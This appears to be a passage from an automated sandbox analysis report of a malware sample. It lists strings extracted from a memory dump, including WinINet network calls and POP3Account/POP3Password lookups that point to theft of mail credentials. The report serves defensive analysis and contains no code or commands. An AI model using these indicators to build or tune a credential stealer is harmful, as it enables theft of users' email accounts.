                                                                                                                                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                                              • API String ID: 0-3155091674
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                                              • API String ID: 0-3155091674
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                                                              • API String ID: 0-4067651292
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                                                              • API String ID: 0-4067651292
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~draGon~$~draGon~
                                                                                                                                                              • API String ID: 0-652033395
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $i$l$o$u
                                                                                                                                                              • API String ID: 0-2051669658
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $e$e$o$y
                                                                                                                                                              • API String ID: 0-3109010100
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $i$l$o$u
                                                                                                                                                              • API String ID: 0-2051669658
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 2$A[]\$Py[F$STS@$^WeW
                                                                                                                                                              • API String ID: 0-3632184533
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: j&+$ j&+5"$5"$H7~u$~u6N
                                                                                                                                                              • API String ID: 0-2345488689
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $e$k$o
                                                                                                                                                              • API String ID: 0-3624523832
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Gon~$~F@7%m$~$~draGon~$~draGon~
                                                                                                                                                              • API String ID: 0-735104890
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Account$POP3Account$POP3Password$Password
                                                                                                                                                              • API String ID: 0-3724906831
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $e$h$o
                                                                                                                                                              • API String ID: 0-3662636641
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $e$k$o
                                                                                                                                                              • API String ID: 0-3624523832
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: P$r$s$w
                                                                                                                                                              • API String ID: 0-3891800351
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                              • API String ID: 0-2877786613
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                              • API String ID: 0-2877786613
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Account$POP3Account$POP3Password$Password
                                                                                                                                                              • API String ID: 0-3724906831
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $e$h$o
                                                                                                                                                              • API String ID: 0-3662636641
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 3$5$7$7
                                                                                                                                                              • API String ID: 0-3057295282
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: [$m$t$y
                                                                                                                                                              • API String ID: 0-3854059060
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: -$A$I$M
                                                                                                                                                              • API String ID: 0-1664541526
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: -$A$I$M
                                                                                                                                                              • API String ID: 0-1664541526
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%